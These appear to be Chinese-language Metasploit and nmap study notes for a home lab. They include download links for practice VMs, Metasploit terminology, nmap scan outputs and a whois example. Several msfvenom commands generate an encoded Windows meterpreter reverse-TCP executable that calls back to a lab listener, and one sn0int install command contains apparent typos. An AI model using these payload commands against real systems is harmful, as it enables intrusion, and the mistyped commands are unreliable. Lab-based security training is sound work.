Windows 2000 Professional

链接:https://pan.baidu.com/s/13OSz_7H1mIpMKJMq92nEqg?pwd=upsm

提取码:upsm

Windows Server 2003 Standard x64 Edition

链接:https://pan.baidu.com/s/1Ro-BoTmp-1kq0W_lB9Oiww?pwd=ngsb

提取码:ngsb

Windows 7 x64

链接:https://pan.baidu.com/s/1-vLtP58-GXmkau0OLNoGcg?pwd=zp3o

提取码:zp3o

Debian 6(Kali Linux)

链接:https://pan.baidu.com/s/1Uw6SXS8z_IxdkNpLr9y0zQ?pwd=s2i5

提取码:s2i5

安装了Apatche、Tomcat、MySQL、 vsftpd并且配套Web安全测试练习教案

cd /usr/local/apache-tomcat-8.5.81/bin ./startup.shservice mysql start

打开浏览器输入127.0.0.1:8080/sec/

Metasploitable2-Linux (with vsftpd 2.3.4)

链接:https://pan.baidu.com/s/1a71zOXGi_9aLrXyEnvkHwQ?pwd=17g6

提取码:17g6

解压后直接为vmx文件,直接可用

基本概念

通讯协议

ARP

ICMP

TCP

专业术语

渗透攻击(Exploit)

测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的有内存溢出,网站程序漏洞利用,配置错误exploit。

攻击载荷(Payload)

我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立个反向连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是能在目标机器上执行有限命令的程序。

Shellcode

是进行攻击时的一系列被当作payload 的指令,通常在目标机器上执行之后提供一个可执行命令的shell

模块(Module)

MSF 的模块,由一系列代码组成。

监听器(Listener)

等待来自被攻击机器的incoming 连接的监听在测试者机器上的程序。

编码器(encoders)

msfencode –l 查看可用的编码器(encoders),效果**的是x86/shikata_ga_nai

Metasploit用户接口

MSF终端

#msfconsolemsf6>help connect

MSF命令行

#msfconsole -x script; set rhost [ip]; set lhost [ip]; set PAYLOAD “…”;run#msfconsole -r path/xxx.rc

Armitage

安装

下载Armitage:https://gitlab.com/kalilinux/packages/armitage

解压armitage

注释掉所有

产生被控端与主控端

扫描

Metasploit功能程序

MSF攻击荷载生成器

# msfvenom -h MsfVenom - a Metasploit standalone payload generator.Also a replacement for msfpayload and msfencode.Usage: /usr/bin/msfvenom [options]Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=-f exe -o payload.exe

Options:

MSF编码器

# msfvenom -l encodersFramework Encoders [--encoder]

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload.exe

MSF攻击载荷

# msfvenom -l payloads

MSF NOP

# msfvenom -l nopsFramework NOPs (11 total)=========================    Name             Description    ----             -----------    aarch64/simple   Simple NOP generator    armle/simple     Simple NOP generator    cmd/generic      Generates harmless padding for command payloads.    mipsbe/better    Better NOP generator    php/generic      Generates harmless padding for PHP scripts    ppc/simple       Simple NOP generator    sparc/random     SPARC NOP generator    tty/generic      Generates harmless padding for TTY input    x64/simple       An x64 single/multi byte NOP instruction generator.    x86/opty2        Opty2 multi-byte NOP generator    x86/single_byte  Single-byte NOP generator MSF平台

MSF平台

# msfvenom -l platformsFramework Platforms [--platform]========================================    Name    ----    aix    android    apple_ios    arista    brocade    bsd    bsdi    cisco    firefox    freebsd    hardware    hpux    irix    java    javascript    juniper    linux    mainframe    mikrotik    multi    netbsd    netware    nodejs    openbsd    osx    php    python    r    ruby    solaris    unifi    unix    unknown

Windows

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload.exe

MSF有效负载和--编码器的体系结构

# msfvenom -l archsFramework Architectures [--arch]========================================    Name    ----    aarch64    armbe    armle    cbea    cbea64    cmd    dalvik    firefox    java    mips    mips64    mips64le    mipsbe    mipsle    nodejs    php    ppc    ppc64    ppc64le    ppce500v2    python    r    ruby    sparc    sparc64    tty    x64    x86    x86_64zarch

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload.exe

MSF应用于外壳代码的加密或编码类型

# msfvenom -l encryptFramework Encryption Formats [--encrypt]================================================    Name    ----    aes256    base64    rc4    xor

MSF文件格式

# msfvenom -l formatsmsfvenom -l formatsFramework Executable Formats [--format]===============================================    Name    ----    asp    aspx    aspx-exe    axis2    dll    elf    elf-so    exe    exe-only    exe-service    exe-small    hta-psh    jar    jsp    loop-vbs    macho    msi    msi-nouac    osx-app    psh    psh-cmd    psh-net    psh-reflection    python-reflection    vba    vba-exe    vba-psh    vbs    warFramework Transform Formats [--format]==============================================    Name    ----    base32    base64    bash    c    csharp    dw    dword    hex    java    js_be    js_le    num    perl    pl    powershell    ps1    py    python    raw    rb    ruby    sh    vbapplication    vbscript

 msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload.exe

查看配置

# msfvenom -p moduleName --list-options

比如:

msfvenom -p windows/shell_reverse_tcp --list-options

Nasm shell

Netwide Assembler (简称 NASM)是一款基于x86架构的汇编与反汇编软件。它可以用来编写16位(8086、80286等)、32位(IA-32)和64位(x86_64)的程序。NASM被认为是Linux平台上最受欢迎的汇编工具之一。

NASM 最初是在朱利安·霍尔(Julian Hall)的协助下由西蒙·泰瑟姆(Simon Tatham)开发的。截至2016年,它被一个由Hans Peter Anvin领导的小团队所维护。 它是一款基于简化版BSD许可证(2-clause BSD License)的开放源代码软件。

cd /usr/share/metasploit-framework/tools/exploit# ./nasm_shell.rb nasm > jmp esp00000000  FFE4              jmp espnasm >

Metasploit Express & Metasploit Pro

信息收集

被动信息搜索

Whois

格式

msf > whois example.commsf> whois 192.168.1.100

例子

msf6 > whois 3testing.com[*] exec: whois 3testing.com   Domain Name: 3TESTING.COM   Registry Domain ID: 513017975_DOMAIN_COM-VRSN   Registrar WHOIS Server: grs-whois.hichina.com   Registrar URL: http://www.net.cn   Updated Date: 2017-06-27T15:41:17Z   Creation Date: 2006-07-09T13:24:36Z   Registry Expiry Date: 2023-07-09T13:24:36Z   Registrar: Alibaba Cloud Computing (Beijing) Co., Ltd.   Registrar IANA ID: 420   Registrar Abuse Contact Email: DomainAbuse@service.aliyun.com   Registrar Abuse Contact Phone: +86.95187   Domain Status: ok https://icann.org/epp#ok   Name Server: DNS10.HICHINA.COM   Name Server: DNS9.HICHINA.COM   DNSSEC: unsigned   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/>>> Last update of whois database: 2022-06-20T04:09:37Z <<<

msf6 > whois 123.56.135.186[*] exec: whois 123.56.135.186% [whois.apnic.net]% Whois data copyright termshttp://www.apnic.net/db/dbcopyright.html% Information related to '123.56.0.0 - 123.57.255.255'% Abuse contact for '123.56.0.0 - 123.57.255.255' is 'ipas@cnnic.cn'inetnum:123.56.0.0 - 123.57.255.255netname:ALISOFTdescr:  Aliyun Computing Co., LTDdescr:  5F, Builing D, the West Lake International Plaza of S&Tdescr:  No.391 Wen'er Road, Hangzhou, Zhejiang, China, 310099country:CNadmin-c:ZM1015-APtech-c: ZM877-APtech-c: ZM876-APtech-c: ZM875-APabuse-c:AC1601-APstatus: ALLOCATED PORTABLEmnt-by: MAINT-CNNIC-APmnt-irt:IRT-CNNIC-CNlast-modified:  2021-06-16T01:25:33Zsource: APNICirt:IRT-CNNIC-CNaddress:Beijing, Chinae-mail: ipas@cnnic.cnabuse-mailbox:  ipas@cnnic.cnadmin-c:IP50-APtech-c: IP50-APauth:   # Filteredremarks:Please note that CNNIC is not an ISP and is notremarks:empowered to investigate complaints of network abuse.remarks:Please contact the tech-c or admin-c of the network.mnt-by: MAINT-CNNIC-APlast-modified:  2021-06-16T01:39:57Zsource: APNICrole:   ABUSE CNNICCNaddress:Beijing, Chinacountry:ZZphone:  +000000000e-mail: ipas@cnnic.cnadmin-c:IP50-APtech-c: IP50-APnic-hdl:AC1601-APremarks:Generated from irt object IRT-CNNIC-CNabuse-mailbox:  ipas@cnnic.cnmnt-by: APNIC-ABUSElast-modified:  2020-05-14T11:19:01Zsource: APNICperson: Li Jiaaddress:NO.969 West Wen Yi Road, Yu Hang District, Hangzhoucountry:CNphone:  +86-0571-85022088e-mail: jiali.jl@alibaba-inc.comnic-hdl:ZM1015-APmnt-by: MAINT-CNNIC-APlast-modified:  2014-07-30T02:02:01Zsource: APNICperson: Guoxin Gaoaddress:5F, Builing D, the West Lake International Plaza of S&Taddress:No.391 Wen'er Road, Hangzhou Cityaddress:Zhejiang, China, 310099country:CNphone:  +86-0571-85022600fax-no: +86-0571-85022600e-mail: anti-spam@list.alibaba-inc.comnic-hdl:ZM875-APmnt-by: MAINT-CNNIC-APlast-modified:  2014-07-30T01:56:01Zsource: APNICperson: security troublee-mail: yitian.gaoyt@alibaba-inc.comaddress:5th,floor,Building D,the West Lake International Plaza of S&T,391#Wen??r Roadaddress:Hangzhou, Zhejiang, Chinaphone:  +86-0571-85022600country:CNmnt-by: MAINT-CNNIC-APnic-hdl:ZM876-APlast-modified:  2021-04-13T23:22:33Zsource: APNICperson: Guowei Panaddress:5F, Builing D, the West Lake International Plaza of S&Taddress:No.391 Wen'er Road, Hangzhou Cityaddress:Zhejiang, China, 310099country:CNphone:  +86-0571-85022088-30763fax-no: +86-0571-85022600e-mail: guowei.pangw@alibaba-inc.comnic-hdl:ZM877-APmnt-by: MAINT-CNNIC-APlast-modified:  2013-07-09T01:34:02Zsource: APNIC% Information related to '123.56.128.0/19AS4837'route:  123.56.128.0/19descr:  CNC Group CHINA169 Fujian Province Networkdescr:  Addresses from APNIC(YJZXNET)country:CNorigin: AS4837mnt-by: MAINT-CNCGROUP-RRlast-modified:  2008-09-04T07:55:26Zsource: APNIC% This query was served by the APNIC Whois Service version 1.88.16 (WHOIS-AU3)

netcraft

https://www.netcraft.com/

https://searchdns.netcraft.com/

Maltego

sn0int

安装

# apt install debian-keyring# gpg -a --export --keyring /usr/share/keyrings/debian-maintainers.gpg git@rxv.cc | apt-key add -# apt-key adv --keyserver keyserver.ubunt.com --refresh-keys dit@rxv.cc# echo deb http://apt.vulns.sexy stable main>/etc/apt/sources.list.d/apt-vulns-key.list# apt update# apt install sn0int#sn0int[sn0int][default] > pkg quickstart

使用

[sn0int][default] > workspace demo[+] Connecting to database[sn0int][demo] > add domain[?] Domain: baidu.com[sn0int][demo] > select domains#1, "baidu.com"[sn0int][demo] > use ctlogs[sn0int][demo][kpcyrd/ctlogs] > run[sn0int][demo] > use ctlogs[sn0int][demo][kpcyrd/ctlogs] > run[*] "baidu.com"             : Adding subdomain "durobotdev.baidu.com"[*] "baidu.com"             : Adding subdomain "play-infoflow.baidu.com"[*] "baidu.com"             : Adding subdomain "www.play-infoflow.baidu.com"[*] "baidu.com"            : Adding subdomain "dlswbr.baidu.com"[*] "baidu.com"            : Adding subdomain "otapcdn.baidu.com"[*] "baidu.com"            : Adding subdomain "foundation.baidu.com"[*] "baidu.com"            : Adding subdomain "mdm-duguanjia.baidu.com"[*] "baidu.com"            : Adding subdomain "lookup.api.bsb.baidu.com"[*] "baidu.com"            : Adding subdomain "download.api.bsb.baidu.com"[*] "baidu.com"           : Adding subdomain "duke.baidu.com"[*] "baidu.com"           : Adding subdomain "ditan.huodong.baidu.com"[*] "baidu.com"           : Adding subdomain "httpsdns.baidu.com"[*] "baidu.com"           : Adding subdomain "vpn.baidu.com"[*] "baidu.com"           : Adding subdomain "otacdn.baidu.com"[*] "baidu.com"           : Adding subdomain "trafficsafe.baidu.com"

ZoomEye

nslookup

msf6 > nslookupset type=mxexample.com

例子

msf6 > nslookup www.3testing.com[*] exec: nslookup www.3testing.comServer: 8.8.8.8Address:8.8.8.8#53Non-authoritative answer:Name:   www.3testing.comAddress: 123.56.135.186msf6 > nslookup www.3testing.com[*] exec: nslookup www.3testing.comServer:       192.168.0.1Address:       192.168.0.1#53Non-authoritative answer:Name:       www.3testing.comAddress: 123.56.135.186

Google Hacking

主动信息搜索

namp扫描

最基本的扫描

#nmap 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:09 CSTNmap scan report for 192.168.0.106Host is up (0.0028s latency).Not shown: 978 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 1.58 seconds

扫描活跃的主机 -sn

#nmap -sn 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:13 CSTNmap scan report for 192.168.0.106Host is up (0.00066s latency).MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds

扫描多台机器

利用IP1IP2 … IPn

# nmap 192.168.0.106 192.168.0.150 192.168.0.158 192.168.0.160Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:27 CSTNmap scan report for 192.168.0.106Host is up (0.0017s latency).Not shown: 978 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap scan report for 192.168.0.158Host is up (0.0087s latency).Not shown: 991 closed tcp ports (reset)PORT      STATE SERVICE135/tcp   open  msrpc139/tcp   open  netbios-ssn445/tcp   open  microsoft-ds49152/tcp open  unknown49153/tcp open  unknown49154/tcp open  unknown49155/tcp open  unknown49156/tcp open  unknown49157/tcp open  unknownMAC Address: 38:00:25:34:7E:7F (Intel Corporate)Nmap scan report for 192.168.0.160Host is up (0.0017s latency).Not shown: 977 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp22/tcp   open  ssh23/tcp   open  telnet25/tcp   open  smtp53/tcp   open  domain80/tcp   open  http111/tcp  open  rpcbind139/tcp  open  netbios-ssn445/tcp  open  microsoft-ds512/tcp  open  exec513/tcp  open  login514/tcp  open  shell1099/tcp open  rmiregistry1524/tcp open  ingreslock2049/tcp open  nfs2121/tcp open  ccproxy-ftp3306/tcp open  mysql5432/tcp open  postgresql5900/tcp open  vnc6000/tcp open  X116667/tcp open  irc8009/tcp open  ajp138180/tcp open  unknownMAC Address: 00:0C:29:FA:DD:2A (VMware)Nmap scan report for 192.168.0.150Host is up (0.0000040s latency).Not shown: 998 closed tcp ports (reset)PORT   STATE SERVICE21/tcp open  ftp80/tcp open  httpNmap done: 4 IP addresses (4 hosts up) scanned in 1.08 seconds

利用IP1-IP2

# nmap 192.168.0.100-160                                       Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:39 CSTNmap scan report for 192.168.0.106Host is up (0.00058s latency).Not shown: 978 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap scan report for 192.168.0.151Host is up (0.016s latency).Not shown: 994 closed tcp ports (reset)PORT     STATE SERVICE135/tcp  open  msrpc139/tcp  open  netbios-ssn445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh5357/tcp open  wsdapiMAC Address: 38:00:25:34:7E:7F (Intel Corporate)Nmap scan report for 192.168.0.158Host is up (0.016s latency).Not shown: 991 closed tcp ports (reset)PORT      STATE SERVICE135/tcp   open  msrpc139/tcp   open  netbios-ssn445/tcp   open  microsoft-ds49152/tcp open  unknown49153/tcp open  unknown49154/tcp open  unknown49155/tcp open  unknown49156/tcp open  unknown49157/tcp open  unknownMAC Address: 38:00:25:34:7E:7F (Intel Corporate)Nmap scan report for 192.168.0.159Host is up (0.012s latency).All 1000 scanned ports on 192.168.0.159 are in ignored states.Not shown: 1000 closed tcp ports (reset)MAC Address: 38:00:25:34:7E:7F (Intel Corporate)Nmap scan report for 192.168.0.150Host is up (0.0000030s latency).Not shown: 998 closed tcp ports (reset)PORT   STATE SERVICE21/tcp open  ftp80/tcp open  httpNmap done: 61 IP addresses (5 hosts up) scanned in 4.12 seconds

利用IP/24

#nmap192.169.0.0/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:34 CSTNmap scan report for 192.168.0.1Host is up (0.0086s latency).Not shown: 998 closed tcp ports (reset)PORT     STATE SERVICE80/tcp   open  http1900/tcp open  upnpMAC Address: F4:83:CD:A6:DE:E3 (Tp-link Technologies)Nmap scan report for 192.168.0.106Host is up (0.0011s latency).Not shown: 978 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap scan report for 192.168.0.151Host is up (0.017s latency).Not shown: 994 closed tcp ports (reset)PORT     STATE SERVICE135/tcp  open  msrpc139/tcp  open  netbios-ssn445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh5357/tcp open  wsdapiMAC Address: 38:00:25:34:7E:7F (Intel Corporate)Nmap scan report for 192.168.0.158Host is up (0.021s latency).Not shown: 991 closed tcp ports (reset)PORT      STATE SERVICE135/tcp   open  msrpc139/tcp   open  netbios-ssn445/tcp   open  microsoft-ds49152/tcp open  unknown49153/tcp open  unknown49154/tcp open  unknown49155/tcp open  unknown49156/tcp open  unknown49157/tcp open  unknownMAC Address: 38:00:25:34:7E:7F (Intel Corporate)Nmap scan report for 192.168.0.159Host is up (0.013s latency).All 1000 scanned ports on 192.168.0.159 are in ignored states.Not shown: 1000 closed tcp ports (reset)MAC Address: 38:00:25:34:7E:7F (Intel Corporate)Nmap scan report for 192.168.0.161Host is up (0.00029s latency).Not shown: 977 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp22/tcp   open  ssh23/tcp   open  telnet25/tcp   open  smtp53/tcp   open  domain80/tcp   open  http111/tcp  open  rpcbind139/tcp  open  netbios-ssn445/tcp  open  microsoft-ds512/tcp  open  exec513/tcp  open  login514/tcp  open  shell1099/tcp open  rmiregistry1524/tcp open  ingreslock2049/tcp open  nfs2121/tcp open  ccproxy-ftp3306/tcp open  mysql5432/tcp open  postgresql5900/tcp open  vnc6000/tcp open  X116667/tcp open  irc8009/tcp open  ajp138180/tcp open  unknownMAC Address: 00:0C:29:FA:DD:2A (VMware)Nmap scan report for 192.168.0.150Host is up (0.0000040s latency).Not shown: 998 closed tcp ports (reset)PORT   STATE SERVICE21/tcp open  ftp80/tcp open  httpNmap done: 256 IP addresses (7 hosts up) scanned in 5.18 seconds

使用ICMP对设备进行扫描

使用ICMP类似Ping的请求响应扫描 -PE

#nmap -PE 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:44 CSTNmap scan report for 192.168.0.106Host is up (0.00018s latency).Not shown: 978 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

使用ICMP时间戳响应扫描 -PP

#nmap -PP 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 11:55 CSTNmap scan report for 192.168.0.106Host is up (0.0021s latency).Not shown: 978 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds

使用ICMP掩码扫描 -PM

#nmap -PM 192.168.0.106

使用TCP对设备进行扫描

使用TCP SYN对设备进行扫描 - PS

#nmap -PS 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:02 CSTNmap scan report for 192.168.0.106Host is up (0.0022s latency).Not shown: 978 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds

使用TCP ACK对设备进行扫描 -PA

# nmap -PA 192.168.0.106 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:05 CSTNmap scan report for 192.168.0.106Host is up (0.00017s latency).Not shown: 978 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 1.42 seconds

使用UDP对设备进行扫描 -PU

UDP扫描更简单,但是不如TCP方便,且慢。

#nmap -PU 192.168.0.106tarting Nmap 7.92 ( https://nmap.org ) at 2022-06-14 18:36 CSTNmap scan report for 192.168.0.106Host is up (0.00076s latency).MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds

对端口进行扫描

端口种类

l公有端口(Well Know Port):0-1024

l注册端口(Registered Port):1025-49,151

l动态/私有端口(Dynamic/Private Port):49,152-65,535

端口状态

lOpen:开放状态。nmap 发起两个 SYN 的请求,服务器上监听在此端口的进程会进行应答,会返回 SYN/ACK, nmap 收到服务端返还回来的应答后会发送两个 RST ,并不会和服务端建立通信连接,完成端口的探测。

lClosed:关闭状态。nmap 发起两个 SYN 的请求,服务器上由于没有进程监听该端口,内核会返回 RST, nmap 收到服务端返还回来的 RST 报文,将探测结果定义为 closed 。

lFiltered:过滤状态。这种情况是服务端将收到的 nmap SYN 报文直接丢弃,不进行应答,由于 nmap 直接发送了两个 SYN 报文,都没有收到应答,所以认定服务端开启了防火墙,将 SYN 报文丢弃。

lUnfiltered:未过滤状态。nmap 默认进行的是 SYN 扫描,当用 -sA 选项( TCP ACK 扫描),连续发送两个同样的 ACK 报文,由于 snmp 确认收到了一个服务端根本没有发送的报文,所以服务端会发送一个 RST 报文, snmp 收到服务端发送来的 RST 报文后,确认服务端没有对报文进行丢弃处理,注意本探测不能发现端口是开放还是关闭状态,只能确认探测的报文服务端已收到,并回复给了 snmp RST报文。

lopen|filtered:开放或过滤状态。这种状态主要是nmap无法区别端口处于 open 状态还是 filtered 状态。这种状态长出现于UDP端口,参考后续 UDP 中的解释。

lclosed|filtered:关闭或者过滤状态。

扫描技术

不扫描端口 -sn

# nmap -sn 192.168.0.106 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:26 CSTNmap scan report for 192.168.0.106Host is up (0.0011s latency).MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds

# nmap -sn -PE 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:27 CSTNmap scan report for 192.168.0.106Host is up (0.00055s latency).MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds

# nmap -sn 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:30 CSTNmap scan report for 192.168.0.1Host is up (0.0043s latency).MAC Address: F4:83:CD:A6:DE:E3 (Tp-link Technologies)Nmap scan report for 192.168.0.106Host is up (0.00036s latency).MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap scan report for 192.168.0.151Host is up (0.12s latency).MAC Address: 38:00:25:34:7E:7F (Intel Corporate)Nmap scan report for 192.168.0.158Host is up (0.12s latency).MAC Address: 38:00:25:34:7E:7F (Intel Corporate)Nmap scan report for 192.168.0.159Host is up (0.086s latency).MAC Address: 38:00:25:34:7E:7F (Intel Corporate)Nmap scan report for 192.168.0.161Host is up (0.00032s latency).MAC Address: 00:0C:29:FA:DD:2A (VMware)Nmap scan report for 192.168.0.150Host is up.Nmap done: 256 IP addresses (7 hosts up) scanned in 2.40 seconds

SYN 半开扫描 -sS

NMAP机器àSYNà机器

机器àSYN+ACKàNMAP机器

NMAP机器àRSTà机器(连接断开)

返回Open、Closed、filtered

#nmap -sS 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:33 CSTNmap scan report for 192.168.0.106Host is up (0.0011s latency).Not shown: 978 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 1.48 seconds

Connect扫描 -sT

完成3次握手

NMAPà机器àSYNà机器

机器àSYN+ACKàNMAP机器

NMAP机器àACK机器(连接建立)

#nmap -sT 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:44 CSTNmap scan report for 192.168.0.106Host is up (0.0013s latency).Not shown: 978 closed tcp ports (conn-refused)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds

UDP扫描 -sU

返回Open、Open|filtered,速度很慢,filtered可能是Open,可能是Closed

